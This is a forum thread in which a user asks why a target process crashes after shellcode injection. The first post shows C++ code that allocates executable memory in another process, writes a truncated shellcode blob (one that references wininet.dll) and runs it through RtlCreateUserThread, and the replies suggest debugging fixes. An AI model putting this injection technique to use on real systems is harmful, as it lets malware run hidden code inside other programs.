Results 1 to 7 of 7

Thread: RtlCreateUserThread best practices

  1. #1

    Question RtlCreateUserThread best practices

    Hi guys
    I have a shell code, used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread
    the code is executed successfully but then the process crash with C000005 excption

    I read aboud DEP, but I already used PAGE_EXECUTE_READWRITE !
    I also tried calling ExitThread
    How to avoid crashing the process ?
    Thanks
    Here is the code
    Code:
    RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread");
        cin >>pid;
     
        HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
    
    	HANDLE code=VirtualAllocEx(hProc, NULL, 508 ,MEM_COMMIT , PAGE_EXECUTE_READWRITE);
    	void * hex =	"\xe9\xff\x00\x00\x00\xe8\x1b\x01"
    "\x00\x00\x77\x69\x6e\x69\x6e\x65"
    "\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....
    DWORD sizeofHex = 509;
    	WriteProcessMemory(hProc,code,hex,sizeofHex,NULL);
    	__try {
    		RtlCreateUserThread(hProc,NULL,false,0,0,0, code,0,&hThd,&cid);
    	}
    	__except (GetExceptionCode() ){
    		return -1;
    	}
        WaitForSingleObject(hThd,INFINITE);
     
        CloseHandle(hThd);
        CloseHandle(hProc);
    Last edited by capadleman; June 18th, 2013 at 12:59. Reason: added the source code
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    We are glad to help you with your question..


    NeO

  3. #3
    OKay I updated my question Neo
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  4. #4
    any code maybe so ppl can have look what you did wrong? i will be just a little sarcastic.. i hope you will get the point what i am saying..

    I have a BOOK, it uses VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread
    the code is executed successfully but then the process crash with C000005 exception.

    I read aboud DEP, but I already used PAGE_EXECUTE_READWRITE !
    I also tried calling ExitThread
    How to avoid crashing the process ?... hmm maybe doing it right;O


    I am not trying to be mean i am just trying to help...

    bye NeO

  5. #5
    No problem, I'm at work now
    so I need to get home to post the code
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  6. #6
    RtlCreateUserThread() - bad api. Use kernel32, because win32(not native). It makes no sense to mix..

  7. #7
    Theres still alot of missing information here, so let me probe a bit.
    First you should know that DEP is also a mechanism that can be enforced at the hardware level, trying to execute a shellcode on the stack regardless of whether youre using VirtualAlloc or not.
    Also I didnt get a chance to see exactly what the shellcode is doing, but have you suspended the target process before trying to execute the shellcode? I can see issues with the current code youre using that may cause some undefined behavior, namely at the point at which the shellcode is trying to be executed via remoteThread.
    Where is the shellcode being injected? Also try adding a check to see if the call to VirtualAllocEx even succeeded, it would be a shame if it didnt right?

Similar Threads

  1. Replies: 11
    Last Post: September 7th, 2009, 15:26
  2. ntdll.RtlCreateUserThread problem
    By vadimpo in forum OllyDbg Support Forums
    Replies: 4
    Last Post: September 5th, 2009, 22:29
  3. Cant attach blocked by RtlCreateUserThread
    By Refund in forum OllyDbg Support Forums
    Replies: 1
    Last Post: January 17th, 2009, 15:50

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •